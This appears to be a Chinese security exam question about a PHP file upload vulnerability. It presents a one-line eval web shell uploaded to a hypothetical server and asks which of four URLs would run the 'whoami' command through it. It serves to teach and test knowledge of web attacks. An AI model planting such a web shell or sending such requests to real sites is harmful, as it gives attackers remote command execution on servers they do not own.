假设某网站www.exploit.com存在文件上传漏洞,php语言编写,根目录是C:\wwwroot,现构造文件名test.php上传到服务器目录C:\wwwroot\upload下,内容为
<?php @eval($_GET['cmd']);?>
,请问下面的哪条url能够在服务器成功执行whoami命令?
http://www.exploit.com/upload/test.php?cmd=system('whoami');
http://www.exploit.com/test.php?cmd=system('whoami');
http://www.exploit.com/upload/test.php?cmd=whoami
http://www.exploit.com/upload/test.php?eval=system('whoami');